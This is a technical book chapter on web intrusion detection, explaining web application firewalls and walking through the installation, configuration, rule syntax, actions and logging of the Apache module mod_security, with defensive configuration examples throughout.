12 Web Intrusion Detection

In spite of all your efforts to secure a web server, there is one part you do not and usually cannot control in its entirety: web applications. Web application design, programming, and maintenance require a different skill set. Even if you have the skills, in a typical organization these tasks are usually assigned to someone other than a system administrator. But the problem of ensuring adequate security remains. This final chapter suggests ways to secure applications by treating them as black boxes and examining the way they interact with the environment. The techniques that do this are known under the name intrusion detection.

This chapter covers the evolution of intrusion detection, the strengths and weaknesses of network-based and host-based systems, the features commonly found in web application firewalls, and the deployment and configuration of mod_security, a web application firewall module for Apache.

Intrusion detection has been in use for many years. Its purpose is to detect attacks by looking at the network traffic or by looking at operating system events. The term intrusion prevention is used to refer to systems that are also capable of preventing attacks.

Today, when people mention intrusion detection, in most cases they are referring to a network intrusion detection system (NIDS). An NIDS works on the TCP/IP level and is used to detect attacks against any network service, including the web server. The job of such systems, the most popular and most widely deployed of all IDSs, is to monitor raw network packets to spot malicious payloads. Host-based intrusion detection systems (HIDSs), on the other hand, work on the host level. Though they can analyze network traffic (only the traffic that arrives at that single host), this task is usually left to NIDSs. Host-based intrusion detection is mostly concerned with the events that take place on the host (such as users logging in and out and executing commands) and the system error messages that are generated. An HIDS can be as simple as a script watching a log file for error messages, as mentioned in Chapter 8. Integrity validation programs (such as Tripwire) are also a form of HIDS. Some systems can be complex: one form of HIDS uses system call monitoring on a kernel level to detect processes that behave suspiciously.

Using a single approach for intrusion detection is insufficient. Security information management (SIM) systems are designed to manage various security-relevant events they receive from agents, where an agent can listen to the network traffic or operating system events or can work to obtain any other security-relevant information.

Because many NIDSs are in place, a large effort was made to make the most of them and to use them for web intrusion detection, too. Though NIDSs work well for the problems they were designed to address and they can provide some help with web intrusion detection, they do not and cannot live up to the full web intrusion detection potential for the following reasons:

  • NIDSs were designed to work with TCP/IP. The Web is based around the HTTP protocol, which introduces a completely new vocabulary with its own set of problems and challenges, different from those of TCP/IP.

  • The real problem is that web applications are not simple users of the HTTP protocol. Instead, HTTP is only used to carry the application-specific data. It is as though each application builds its own protocol on top of HTTP.

  • Many new protocols are deployed on top of HTTP (think of Web Services, XML-RPC, and SOAP), pushing the level of complexity further up.

  • Other problems, such as the inability of an NIDS to see through encrypted SSL channels (which most web applications that are meant to be secure use) and the inability to cope with a large amount of web traffic, make NIDSs insufficient tools for web intrusion detection.

Vendors of NIDSs have responded to the challenges by adding extensions to better understand HTTP. The term deep-inspection firewalls refers to systems that make an additional effort to understand the network traffic on a higher level. Ultimately, a new breed of IDSs was born. Web application firewalls (WAFs), also known as web application gateways, are designed specifically to guard web applications. Designed from the ground up to support HTTP and to exploit its transactional nature, web application firewalls often work as reverse proxies. Instead of going directly to the web application, a request is rerouted to go to a WAF first and only allowed to proceed if deemed safe.

Web application firewalls were designed from the ground up to deal with web attacks and are better suited for that purpose. NIDSs are better suited for monitoring on the network level and cannot be replaced for that purpose.

Though most vendors are focusing on supporting HTTP, the concept of application firewalls can be applied to any application and protocol. Commercial products have become available that act as proxies for other popular network protocols and for popular databases. (Zorp, at http://www.balabit.com/products/zorp/, available under a commercial and open source license, is one such product.)

Learn more about intrusion detection to gain a better understanding of common problems. I have found the following resources useful:

I already covered one form of web intrusion detection in Chapter 8. Log-based web intrusion detection makes use of the fact that web servers produce detailed access logs, in which information about every request is kept. It is also possible to create logs in special formats to control which data is collected. This method introduces intrusion detection to a system cost-effectively, but there is a drawback: because log analysis is performed only after transactions take place, attack prevention is not possible, only detection. If you can live with that (it is a valid decision and it depends on your threat model), then you only need to take a few steps to implement this technique:

  1. Make sure logging is configured and takes place on all web servers.

  2. Optionally reconfigure logging to log more information than that configured by default.

  3. Collect all logs to a central location.

  4. Implement scripts to examine the logs regularly, in real time or in batch mode (e.g., daily).

That is all there is to it. (Refer to Chapter 8 for a detailed discussion.)
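For step 2, here is a minimal sketch of extended logging; the format name and file path are illustrative only. It adds the Referer and User-Agent headers and the time taken to serve each request to the common log format, all of which are useful when investigating suspicious activity:

# Log additional fields useful for intrusion detection
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T" detection
CustomLog /var/www/logs/access_log detection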

With real-time intrusion detection, not only can you detect problems, but you can react to them as well. Attack prevention is possible, but it comes with a price tag of increased complexity and more time required to run the system. Most of this chapter discusses ways of running real-time web intrusion detection. There are two approaches: embed the detection engine in the web server itself, or deploy it on the network as a standalone device (typically working as a reverse proxy) through which traffic is routed.

Which of these two you choose depends on your circumstances. The web server-based approach is easy to implement since it does not mandate changes to the network design and configuration. All that is needed is the addition of a module to the web server. But if you have many web servers, and especially if the network contains proprietary web servers, then having a single place from which to perform intrusion detection can be the more efficient approach. Though network-based web IDSs typically perform full separation of clients and servers, web server-based solutions can be described more accurately as separating clients from applications, with servers left unprotected in the middle. In this case, therefore, network-based protection is better because it can protect from flaws in web servers, too.

With Apache and mod_security you can choose either approach to real-time web intrusion detection. If network-based web intrusion detection suits your needs best, then you can build such a node by installing an additional Apache instance with mod_security to work in a reverse proxy configuration. (Reverse proxy operation is discussed in Chapter 9.) Aside from initial configuration, the two modes of operation are similar. The rest of this chapter applies equally to both.

Later in this chapter, I will present a web intrusion detection solution based on open source components. The advantage of using open source components is that they are free and familiar (being based on Apache). Products from the commercial arena have more features, and they have nice user interfaces that make some tasks much easier. Here I will present the most important aspects of web IDSs, even if some features are present only in commercial products. I expect the open source products to catch up, but at this point a discussion of web intrusion detection cannot be complete without including features available only in commercial products. The following sections describe some common intrusion detection features.

If you have ever worked to develop a firewall policy, you may have been given (good) advice to first put rules in place to deny everything, and then proceed to allow what is safe. That is a positive security model. On the other side is a negative security model, in which everything that is not dangerous is allowed. Each approach asks a different question: the positive model asks, "What is safe?" and denies everything else, while the negative model asks, "What is dangerous?" and allows everything else.

A negative security model is used more often. You identify a dangerous pattern and configure your system to reject it. This is simple, easy, and fun, but not foolproof. The concept relies on you knowing what is dangerous. If there are aspects of the problem you are not aware of (which happens from time to time) then you have left a hole for the attacker to exploit.

A positive security model (also known as a white-list model) is a better approach to building policies and works well for firewall policy building. In the realm of web application security, a positive security model approach boils down to enumerating every script in the application. For each script in the list, you need to determine the following (the positive security model example near the end of this chapter shows what the resulting rules look like):

  • The request methods the script accepts

  • The parameters it accepts, and which of them are mandatory

  • The permitted format and length of every parameter value

This is what programmers are supposed to do but frequently do not. Using the positive security model is better if you can afford to spend the time to develop it. One difficult aspect of this approach is that the application model changes as the application evolves. You will need to update the model every time a new script is added to the application or if an existing one changes. But it works well to protect stable, legacy applications that no one maintains anymore.

Automating policy development can ease these problems; for example, some tools can observe live application traffic and use it to generate a policy model automatically, leaving you to review and refine the result.

Rule-based IDSs comprise the majority of what is available on the market. In principle, every request (or packet in the case of NIDS) is subject to a series of tests, where each test consists of one or more inspection rules. If a test fails, the request is rejected as invalid.

Rule-based IDSs are easy to build and use and are efficient when used to defend against known problems or when the task is to build a custom defense policy. But since they must know about the specifics of every threat to protect from it, these tools must rely on using extensive rule databases. Vendors maintain rule databases and distribute their tools with programs to update IDS installations automatically.

This approach is unlikely to be able to protect custom applications or to protect from zero-day exploits (exploits that attack vulnerabilities not yet publicly known). This is where anomaly-based IDSs work better.

The idea behind anomaly-based protection is to build a protection layer that will observe legal application traffic and then build a statistical model to judge the future traffic against. In theory, once trained, an anomaly-based system should detect anything out of the ordinary. With anomaly-based protection, rule databases are not needed and zero-day exploits are not a problem. Anomaly-based protection systems are difficult to build and are thus rare. Because users do not understand how they work, many refuse to trust such systems, making them less popular.

The stateless nature of the HTTP protocol has many negative impacts on web application security. Sessions can and should be implemented on the application level, but for many applications the added functionality is limited to fulfilling business requirements other than security. Web IDSs, on the other hand, can throw their full weight into adding various session-related protection features. Some of the features include:

Enforcement of entry points

At most web sites, you can start browsing from any site URL that is known to you. This is often convenient for attackers and inconvenient for defenders. An IDS that understands sessions will realize the user is making his first request and redirect him back to the default entry point (possibly logging the event).

Observation of each user session individually

Being able to distinguish one session from another opens interesting possibilities, e.g., it becomes possible to watch the rate at which requests are made and the way users navigate through the application, going from one page to another. Looking at the behavior of just one user, it becomes much easier to detect intrusion attempts.

Detecting and responding to brute-force attacks

Brute-force attacks normally go undetected in most web applications. With state management in place, an IDS tracks unusual events (such as login failures), and it can be configured to take action when a threshold is reached. It is often convenient to slow down future authentication attempts slightly, not enough for real users to notice but enough to practically stop automated scripts. If an authentication script takes 50 milliseconds to make a decision, a script can make around 20 attempts per second. If you introduce a delay of, say, one second, that will bring the speed to under one attempt per second. That, combined with an alert to someone to investigate further, would provide a decent defense. (A configuration sketch for this defense follows this list of features.)

Implementation of session timeouts

Sessions can be expired after a configured timeout, requiring users to re-authenticate. Users can also be logged out automatically after a period of inactivity.

Detection and prevention of session hijacking

In most cases, session hijacking results in a change of IP address and some other request data (that is, request headers are likely to be different). A stateful monitoring tool can detect the anomalies and prevent exploitation from taking place. The recommended action to take is to terminate the session, ask the user to re-authenticate, and log a warning.

Allowing only links provided to the client in the previous request

Some tools can be strict and only allow users to follow the links that have been given in the previous response. This seems like an interesting feature but can be difficult to implement. One problem with it is that it prevents the user from using more than one browser window with the application. Another problem is that it can cause incompatibilities with applications using JavaScript to construct links dynamically.
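Returning to brute-force defense: with mod_security (covered in detail later in this chapter), a minimal sketch of the slow-down technique might look like the following. The login script path and the one-second delay are assumptions for illustration:

# Pause one second (1,000 ms) on every login attempt, then
# let the request proceed; log the event for later analysis
<Location /login.php>
    SecFilterSelective REQUEST_METHOD ^POST$ pause:1000,log,pass
</Location>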

One area where network-based IDSs have had trouble with web traffic is evasion techniques (see Chapter 10). The problem is that there are many ways to alter incoming (attack) data so that it keeps its original meaning, and the application still interprets it, yet it is modified sufficiently to sneak under the IDS radar. This is an area where dedicated web IDSs provide significant improvement. For example, just by looking at a whole HTTP request at a time, an entire class of attacks based on request fragmentation is avoided. And because they understand HTTP well and can separate dynamic requests from requests for static resources (and thus choose not to waste time protecting static requests that cannot be compromised), they can afford to apply many anti-evasion techniques that would prove too time consuming for NIDSs.

mod_security is a web application firewall module I developed for the Apache web server. It is available under the open source GPL license, with commercial support and commercial licensing as an option. I originally designed it as a means to obtain a proper audit log, but it grew to include other security features. There are two versions of the module, one for each major Apache branch, and they are almost identical in functionality. In the Apache 2 version, mod_security uses the advanced filtering API available in that version, making interception of the response body possible. The Apache 2 version is also more efficient in terms of memory consumption. In short, mod_security does the following:

  • Intercepts HTTP requests, including request bodies, before they are fully processed by the web server

  • Performs anti-evasion normalization and encoding validation

  • Applies user-defined rules to any part of the request and, in the Apache 2 version, to the response

  • Intercepts, validates, and optionally stores uploaded files

  • Records complete transactions in an audit log

In this section, I present a deployment guide for mod_security, but the principles behind it are the same and can be applied to any web application firewall. For a detailed reference manual, visit the project documentation area at http://www.modsecurity.org/documentation/.

The basic ingredients of every mod_security configuration are:

  • The filtering engine switch (SecFilterEngine)

  • Request body buffering (SecFilterScanPOST)

  • Encoding validation and anti-evasion settings

  • The default action list (SecFilterDefaultAction)

  • Filtering rules (SecFilter and SecFilterSelective)

  • Debug and audit logging settings

The purpose of this section is to present enough information about how these ingredients interact with each other to enable you to configure and use mod_security. The subsequent sections cover advanced topics that provide the additional insight needed in some specific cases.

To install mod_security, you need to compile it using the apxs tool, as you would any other module. Some contributors provide system-specific binaries for download, and I put links to their web sites at http://www.modsecurity.org/download/. If you have installed Apache from source, apxs will be with other Apache binaries in the /usr/local/apache/bin/ folder. If you cannot find the apxs tool on your system, examine the vendor-provided documentation to learn how to add it. For example, on Red Hat systems apxs is a part of the httpd-devel package.

Change to the correct source code directory (there is one directory for each Apache branch) and execute the following commands:

# /usr/local/apache/bin/apxs -cia mod_security.c
# /usr/local/apache/bin/apachectl stop
# /usr/local/apache/bin/apachectl start

After having restarted Apache, mod_security will be active but disabled. I recommend the following configuration to enable it with minimal chances of denying legitimate requests. You can enable mod_security with fewer configuration directives; most options have default settings that match the configuration below, but I prefer to configure things explicitly rather than wonder whether I understand what the default settings are:

# Enable mod_security
SecFilterEngine On
   
# Retrieve request payload
SecFilterScanPOST On
   
# Reasonable automatic validation defaults
SecFilterCheckURLEncoding On
SecFilterCheckCookieFormat Off
SecFilterNormalizeCookies Off
SecFilterCheckUnicodeEncoding Off
   
# Accept almost all byte values
SecFilterForceByteRange 1 255
   
# Reject invalid requests with status 403
SecFilterDefaultAction deny,log,status:403
   
# Only record the relevant information 
SecAuditEngine RelevantOnly
SecAuditLog /var/www/logs/audit_log
   
# Where to store temporary and intercepted files
SecUploadDir /var/www/logs/files/
# Do not store intercepted files for the time being
SecUploadKeepFiles Off
   
# Use 0 for the debug level in production
# and 4 for testing
SecFilterDebugLog /var/www/logs/modsec_debug_log
SecFilterDebugLevel 4

Starting from the top, this configuration data enables mod_security and tells it to intercept request bodies, configures settings for various encoding validation and anti-evasion features (explained below), configures the default action list to handle invalid requests, and configures the two log types.

After adding the configuration data to your httpd.conf file, make a couple of requests to the web server and examine the audit_log and modsec_debug_log files. Without any rules configured, there won’t be much output in the debug log but at least you will be certain the module is active.

To use mod_security effectively, you must understand what it does to every request and in what order. Generally, processing consists of four phases:

Initialization

At the beginning of this phase, mod_security determines whether it should process the request. No processing will be performed unless the module is explicitly enabled in configuration (via SecFilterEngine On). Similarly, if the module is configured only to process dynamic requests (via SecFilterEngine DynamicOnly) and the current request is for a static resource, processing will end immediately.

If the processing is to continue, the module will initialize its structures, read in the complete request body (if one is present and if request body buffering is enabled), and perform initial request validation as defined in the configuration. The initial request validation covers the whole of the request: the first line, the headers, and the parameters. If any part of the request fails validation, the request will be rejected. This will happen even if the default action (configured using the SecFilterDefaultAction directive) is configured to allow requests to proceed in case of a rule match. This exception is necessary for mod_security to have consistent internal structures to base the rest of processing on. If you do not want a request to be rejected under any circumstances, then disable all encoding validation options (a configuration sketch follows these phase descriptions).

Input analysis

In the input analysis phase, the rule engine is activated to apply rules to the requests and perform actions specified in the configuration. If the request passes this phase, Apache will call the request handler to process the request.

Output analysis

The output analysis phase exists only in the Apache 2 version of the module and only occurs if output buffering is enabled. In that case, mod_security intercepts output and stores it until the entire response is generated. After that, the rule engine is activated again but this time to analyze the response data.

Logging

The logging phase is the last to take place. This phase does not depend on previous phases. For example, the mod_security rule engine may be turned off but the audit engine may continue to work. Similar to what takes place at the beginning of the initialization phase, the first task that is performed at the beginning of the logging phase is to determine whether logging should take place, based on your configuration.
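Referring back to the initialization phase: if you truly never want a request rejected during validation, a minimal sketch relaxes the validation options shown in the earlier configuration example:

# Turn off all automatic validation so that no request
# is rejected during the initialization phase
SecFilterCheckURLEncoding Off
SecFilterCheckUnicodeEncoding Off
SecFilterCheckCookieFormat Off
SecFilterForceByteRange 1 255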

As mentioned in Chapter 10, evasion techniques can be used to sneak in malicious payload undetected by web intrusion detection software. To counter that, mod_security performs the following anti-evasion techniques automatically:

  • Decodes URL-encoded text (e.g., changing %26 to &)

  • Converts Windows folder separation characters to Unix folder separation characters (\ to /)

  • Removes self references (converting /./ to /)

  • Removes redundant folder separation characters (e.g., changing // to /)

  • Changes content to lowercase

  • Converts null bytes to spaces

In some ways, encoding validation can be treated as anti-evasion. As mentioned previously, web servers and applications are often very flexible and allow invalid requests to be processed anyway. Using one of the following encoding validation options, it is possible to restrict what is accepted:

URL encoding validation

Certain invalid URL encodings (e.g., %XV, as explained in Chapter 10) can be used to bypass application security mechanisms. When URL encoding validation is turned on for mod_security, requests will be rejected if either of the two possible invalid encoding situations is encountered: an invalid hexadecimal number or a missing hexadecimal number.

Unicode encoding validation

Invalid or overlong Unicode characters are often dangerous. Turning on Unicode encoding validation can detect three types of problems: invalid characters, missing bytes, and overlong characters. This type of validation is off by default since many applications do not understand Unicode, and it is not possible to detect whether they do by looking at a request. Applications that are not Unicode aware sometimes use character combinations that are valid but that resemble special Unicode characters. Unicode validation would interpret such combinations as attacks and lead to false positives.

Cookie format validation

This option enforces strict cookie formats. It is disabled by default.

Cookie value normalization

Cookie values are often URL encoded though such encoding is not mandated by the specification. Performing normalization (which includes all anti-evasion actions) on the value allows a rule to see through the encoding. However, if URL encoded cookies are not used, false positives are possible. Enable cookie value normalization only if appropriate.

Byte range validation

Some applications use only a small part of the full range of byte values (0-255). For example, applications designed only for the English-speaking population might use only values between 32 and 126, inclusive. Restricting the bytes that can be used in a request to a small range can be beneficial as it reduces the chances of a successful buffer overflow attack. This validation option is controlled with the SecFilterForceByteRange directive (shown in the earlier configuration example and demonstrated below).
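For example, a sketch for an application that serves only English-speaking users might restrict requests to printable ASCII:

# Accept only printable ASCII characters (byte values 32-126)
SecFilterForceByteRange 32 126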

The best part of mod_security is its flexible rule engine. In the simplest form, a rule requires only a single keyword. The SecFilter directive performs a broad search against the request parameters, as well as against the request body for POST requests:

SecFilter KEYWORD

If the keyword is detected, the rule will be triggered and will cause the default action list to be executed.

The keyword is actually a regular expression pattern. Using a simple string, such as 500, will find its occurrence anywhere in the search content. To make full use of mod_security, learn about regular expressions. If you are unfamiliar with them, I suggest the link http://www.pcre.org/pcre.txt as a good starting point. If you prefer a book, check out Mastering Regular Expressions by Jeffrey E. F. Friedl (O’Reilly), which is practically a regular expression reference guide.

Here are a couple of points I consider important:

  • A pattern normally matches anywhere in the searched content; use the anchors ^ (beginning) and $ (end) when the whole value must match.

  • In mod_security, preceding a pattern with an exclamation mark (!) inverts the rule, so it triggers when the pattern does not match.

I will demonstrate what can be done with regular expressions with a pattern you will find useful in the real world: ^[0-9]{1,9}$. Because it is anchored at both ends, this pattern matches only values that consist entirely of digits, at least one and at most nine of them.
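Such a pattern is typically used in a selective rule (introduced next). For instance, assuming a parameter named id, the following hypothetical rule rejects any value that is not a one- to nine-digit number:

SecFilterSelective ARG_id !^[0-9]{1,9}$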

Although broad rules are easy to write, they usually do not work well in real life. Their use significantly increases the chances of introducing false positives and reducing system availability to its legitimate users (not to mention the annoyance they cause). A much better approach to rule design is to consider the impact and only apply rules to certain parts of HTTP requests. This is what SecFilterSelective is for. For example, the following rule will look for the keyword only in the query string:

SecFilterSelective QUERY_STRING KEYWORD

The QUERY_STRING variable is one of the supported variables. The complete list is given in Table 12-1 (standard variables, also available to mod_rewrite and CGI scripts) and Table 12-2 (extended variables specific to mod_security). In most cases, the variable names are the same as those used by mod_rewrite and the CGI specification.

Table 12-1. Standard rule variables

Variable name

Description

REMOTE_ADDR

IP address of the client.

REMOTE_HOST

Host name of the client, when available.

REMOTE_USER

Authenticated username, when available.

REMOTE_IDENT

Remote username (provided by the identd daemon but almost no one uses it any more).

REQUEST_METHOD

Request method (e.g., GET, POST).

SCRIPT_FILENAME

Full system path for the script being executed.

PATH_INFO

The extra part of the URI given after the script name. For example, if the URI is /view.php/5, the value of PATH_INFO is /5.

QUERY_STRING

The part of the URI after the question mark, when available (e.g. id=5).

AUTH_TYPE

The string Basic or Digest, when available.

DOCUMENT_ROOT

Path to the document root, as specified with the DocumentRoot directive.

SERVER_ADMIN

The email address of the server administrator, as specified with the ServerAdmin directive.

SERVER_NAME

The hostname of the server, as specified with the ServerName directive.

SERVER_ADDR

The IP address of the server where the request was received.

SERVER_PORT

Server port where the request was received.

SERVER_PROTOCOL

The protocol specified in the request (e.g., HTTP/1.1).

SERVER_SOFTWARE

Apache version, as configured with ServerTokens.

TIME_YEAR

Current year (e.g., 2004).

TIME_MON

Current month as a number (e.g., 10 for October).

TIME_DAY

Current day of month as a number.

TIME_HOUR

Current hour as a number in a 24-hour day (e.g., 14 for 2 PM).

TIME_MIN

Current minute.

TIME_SEC

Current second.

TIME_WDAY

Current weekday as a number (e.g., 4 for Thursday when Monday is considered to be the first day of the week).

TIME

Current time as a combination of individual elements listed above in the form YmdHMS (e.g., 20041014144619 for October 14 2004, 14:46:19).

THE_REQUEST

Complete first line of the request (e.g., GET /view.php?id=5 HTTP/1.0).

REQUEST_URI

The second token on the request line (e.g., /view.php?id=5).

REQUEST_FILENAME

A synonym for SCRIPT_FILENAME.

Table 12-2. Extended rule variables

Variable Name

Description

POST_PAYLOAD

Gives access to the raw request body except for requests using the multipart/form-data encoding (which is required for file uploads). In such cases, the request body will probably contain binary data and interfere with regular expressions. To get around this problem, mod_security takes the original request apart and re-creates and gives access to a fake request body in the application/x-www-form-urlencoded format, effectively hiding the differences between the two formats.

HTTP_headername

Value of the header headername. The prefix HEADER_ (in place of HTTP_) will also work.

ENV_envname

Value of the environment variable envname.

ARG_varname

Value of the parameter varname.

ARGS

Gives direct access to a single string containing all parameters and their values, which is equal to the combined value of QUERY_STRING and POST_PAYLOAD. (The request body will be faked if necessary, as discussed above.)

ARGS_COUNT

Number of parameters in the request.

ARGS_NAMES

List of the names of all parameters given to the script.

ARGS_VALUES

List of the values of all parameters given to the script.

FILE_NAME_varname

The filesystem name of the file contained in the request and associated with the script parameter varname.

FILE_SIZE_varname

The size of file uploaded in the parameter varname.

FILES_COUNT

Number of files contained in the request.

FILES_NAMES

List of the filesystem names of all files contained in the request.

FILES_SIZES

List of the sizes of all files.

HEADERS

List of all request headers, in the form "Name: Value".

HEADERS_COUNT

Number of headers in the request.

HEADERS_NAMES

List of the names of all headers in the request.

HEADERS_VALUES

List of the values of all headers in the request.

SCRIPT_UID

The uid of the owner of the script that will handle the request.

SCRIPT_GID

The gid of the group of the script that will handle the request.

SCRIPT_USERNAME

The username equivalent to the uid. Using a username is slower than using a uid since mod_security needs to perform a lookup every time.

SCRIPT_GROUPNAME

The group name equivalent to the gid. Using a group name is slower than using a gid as well.

SCRIPT_MODE

Script permissions, in the standard Unix format, with four digits with a leading zero (e.g., 0755).

COOKIE_cookiename

Value of the cookie cookiename.

COOKIES_COUNT

Number of cookies in the request.

COOKIES_NAMES

List of the names of all cookies given to the script.

COOKIES_VALUES

List of the values of all cookies given to the script.

When using selective rules, you are not limited to examining one field at a time. You can separate multiple variable names with a pipe. The following rule demonstrates how to access named parts of the request, in this example, a parameter and a cookie:

# Look for the keyword in the parameter "authorized"
# and in the cookie "authorized". A match in either of
# them will trigger the rule.
SecFilterSelective ARG_authorized|COOKIE_authorized KEYWORD

If a variable is absent from the current request, it will be treated as empty. For example, to detect the presence of a variable, use the following format, which triggers execution of the default action list whenever the variable is not empty:

SecFilterSelective ARG_authorized !^$

A special syntax allows you to create exceptions. The following applies the rule to all parameters except the parameter html:

SecFilterSelective ARGS|!ARG_html KEYWORD

Finally, single rules can be combined to create more complex expressions. In my favorite example, I once had to deploy an application that had to be publicly available because our users could be located anywhere on the Internet. The application had a powerful, potentially devastating administration account, and the login page for normal users and for the administrator was the same. It was impossible to use other access control methods to restrict administrative logins to an IP address range, and modifying the source code was not an option because we had no access to it. I came up with the following two rules:

SecFilterSelective ARG_username ^admin$ chain
SecFilterSelective REMOTE_ADDR !^192\.168\.254\.125$

The first rule triggers whenever someone tries to log in as an administrator (it looks for a parameter username with value admin). Without the optional action chain being specified, the default action list would be executed. Since chain is specified, processing continues with execution of the second rule. The second rule allows the request to proceed if it is coming from a single predefined IP address (192.168.254.125). The second rule never executes unless the first rule is satisfied.

You can do many things when an invalid request is discovered. The SecFilterDefaultAction directive determines the default action list:

# Reject invalid requests with status 403
SecFilterDefaultAction deny,log,status:403

You can override the default action list by supplying a list of actions to individual rules as the last (optional) parameter:

# Only log a warning message when the KEYWORD is found
SecFilter KEYWORD log,pass

The full list of supported actions is given in Table 12-3.

Table 12-3. mod_security action list

Action

Description

allow

Skip over the remaining rules and allow the request to be processed.

auditlog

Log the request to the audit log.

chain

Chain the current rule with the one that follows. Process the next rule if the current rule matches. This feature allows many rules to be used as one, performing a logical AND.

deny

Deny request processing.

exec:filename

Execute the external script specified by filename on rule match.

id:n

Assign a unique ID n to the rule. The ID will appear in the log. Useful when there are many rules designed to handle the same problem.

log

Log the rule match. A message will go into the Apache error log and into the audit log (if such logging is enabled).

msg:text

Assign a message text to the rule, which will appear in the log.

noauditlog

Do not log the request to the audit log. All requests that trigger a rule will be written to the audit log by default (unless audit logging is completely disabled by configuration). This action should be used when you don’t want a request to appear in the audit log (e.g., it may be too long and you do not need it).

nolog

Do not log the rule match.

pass

Proceed to the next rule in spite of the current rule match. This is useful when you want to perform some action but otherwise don’t want to reject the request.

pause:n

Pause for n milliseconds on rule match. Be careful with this one; it makes it easy to DoS yourself by having many Apache processes sleep for too long a time.

redirect:url

Perform a redirection to the address specified by url when a request is denied.

setenv:name=value

Set the environment variable name to value. The value is optional. 1 is used if the parameter is omitted.

skipnext:n

On rule match skip the next n rules (or just one if the parameter is omitted).

status:n

Configure the status n to be used to deny the request.
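As an illustration of combining actions, the following hedged example (the URL is hypothetical) logs the match and redirects the offending client to a warning page instead of returning an error status:

# On match, log the event and redirect the client
SecFilter KEYWORD log,redirect:http://www.example.com/warning.html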

There are three places where, depending on the configuration, you may find mod_security logging information:

  • The Apache error log, where rule matches are recorded (unless suppressed with the nolog action)

  • The mod_security debug log, configured with the SecFilterDebugLog directive

  • The mod_security audit log, configured with the SecAuditLog directive

Here is an example of an error message resulting from invalid content discovered in a cookie:

[Tue Oct 26 17:44:36 2004] [error] [client 127.0.0.1]
mod_security: Access denied with code 500. Pattern match "!(^$|^[a-zA-Z0-9]+$)"
at COOKIES_VALUES(sessionid) [hostname "127.0.0.1"]
[uri "/cgi-bin/modsec-test.pl"] [unique_id bKjdINmgtpkAADHNDC8AAAAB]

The message indicates that the request was rejected (“Access denied”) with an HTTP 500 response because the content of the cookie sessionid contained content that matched the pattern !(^$|^[a-zA-Z0-9]+$). (The pattern allows a cookie to be empty, but if it is not, it must consist only of one or more letters and digits.)

In addition to the basic information presented in the previous sections, some additional (important) aspects of mod_security operation are presented here.

The use of mod_security results in increased memory consumption by the Apache web server. The increase can be very small, but it can be very big in some rare circumstances. Understanding why it happens will help you avoid problems in those rare circumstances.

When mod_security is not active, Apache only sees the first part of the request: the request line (the first line of the request) and the subsequent headers. This is enough for Apache to do its work. When request processing begins, the module that does the processing feeds the request body to where it needs to be consumed. In the case of PHP, for example, the request body goes directly to PHP. Apache almost never sees it. With mod_security enabled, it becomes a requirement to have access to the complete request body before processing begins. That is the only approach that can protect the application. (Early versions of mod_security did look at the body bit by bit but that proved to be insufficient.) That is why mod_security reads the complete request into its own buffer and later feeds it from there to the processing module. Additional memory space is needed so that the anti-evasion processing can take place. A buffer twice the size of the request body is required by mod_security to complete processing.

In most cases, this is not a problem since request bodies are small. The only case when it can be a problem is when file upload functionality is required. Files can be quite large (sizes of over 100 MB are not unheard of), and mod_security will want to put all of them into memory, twice. If you are running Apache 1, there is no way around this but to disable request body buffering (as described near the end of this chapter) for those parts of the application where file upload takes place. You can also (and probably should) limit the maximum size of the body by using the Apache configuration directive LimitRequestBody. There is good news for the users of Apache 2, though. Because of its powerful content filtering API, mod_security for Apache 2 is able to stream the request body to disk if its size is larger than a predefined value (using the directive SecUploadInMemoryLimit, set to 64 KB by default), so increased memory consumption does not take place. However, mod_security will need to store the complete request to disk and read it again when it sends it forward for processing.
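A sketch combining both suggestions follows; the limits are illustrative only:

# Reject request bodies larger than 1 MB
LimitRequestBody 1048576
# Apache 2 only: stream request bodies larger than 64 KB
# to disk instead of holding them in memory
SecUploadInMemoryLimit 65536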

A similar thing happens when you enable output monitoring (described later in this chapter). Again, the output cannot and will not be delivered to the client until all of it is available to mod_security and after the analysis takes place. This process introduces response buffering. At the moment, there is no way to limit the amount of memory spent doing output buffering, but it can be used in a controlled manner and only enabled for HTML or text files, while disabled for binary files, via output filtering, described later in this chapter.

Although mod_security supports the exec action, which allows a custom script to be executed when a rule matches, Apache itself offers two mechanisms that allow for tighter integration and more flexibility.

One mechanism you should use is the ErrorDocument, which allows a script to be executed (among other things) whenever request processing returns with a particular response status code. This feature is frequently used to create a “Page not found” message. Depending on your security policy, the same feature can be used to explain that the security system you put in place believes something funny is going on and, therefore, decided to reject the request. At the same time, you can add code to the script to do something else, for example, to send a notification somewhere. An example script for Apache integration comes with the mod_security distribution.
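For example, assuming the default action list denies requests with status 403 (as configured earlier), a sketch of such integration might be (the script path is hypothetical):

# Invoke a custom script whenever a request is denied
ErrorDocument 403 /cgi-bin/error403.pl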

The other thing you can do is add mod_unique_id (distributed with Apache and discussed in Chapter 8) into your configuration. After you do, this module will generate a unique ID (guaranteed to be unique within the server) for every request, storing it in the environment variable UNIQUE_ID (where it will be picked up by mod_security). This feature makes it easy to find the request you are looking for. I frequently use it in the output of an ErrorDocument script, where the unique ID is presented to the user with instructions to cite it as a reference when she complains to the support group. This allows you to quickly and easily pinpoint and solve the problem.
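Assuming mod_unique_id was compiled as a shared module, enabling it is a one-line change:

# Generate a unique ID for every request; mod_security picks
# it up from the UNIQUE_ID environment variable
LoadModule unique_id_module modules/mod_unique_id.so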

Deploying a web application firewall for a known system requires planning and careful execution. It consists of the following steps:

  1. Learn about the system you want to protect.

  2. Decide whether intrusion detection can bring a noticeable increase in security.

  3. Establish a protection policy.

  4. Install and configure the tool.

  5. Deploy in detection mode, and switch to prevention mode only once you are confident in the configuration.

Probably the best advice I can give is for you to learn about the system you want to protect. I am asked all the time to provide an example of a tight mod_security configuration, but I hesitate and almost never do. Intrusion detection (like many other security techniques) is not a simple, fire-and-forget solution, in spite of what some commercial vendors say. Incorrect rules, when deployed, will result in false positives that waste analysts' time. When used in prevention mode, false positives result in reduced system availability, which translates to lost revenue (or increased operations expenses, depending on the way you look at it).

In step 2, you need to decide whether intrusion detection can bring a noticeable increase in security. This is not the same as what I previously discussed in this chapter, that is, whether intrusion detection is a valid tool at all. Here, the effort of introducing intrusion detection needs to be weighed against other ways to solve the problem. First, understand the time commitment intrusion detection requires. If you cannot afford to follow up on all alerts produced by the system and to work continuously to tweak and improve the configuration, then you might as well give up now. The other thing to consider is the nature and the size of the system you want to protect. For smaller applications for which you have the source code, invest in a code review and fix the problems in the source code.

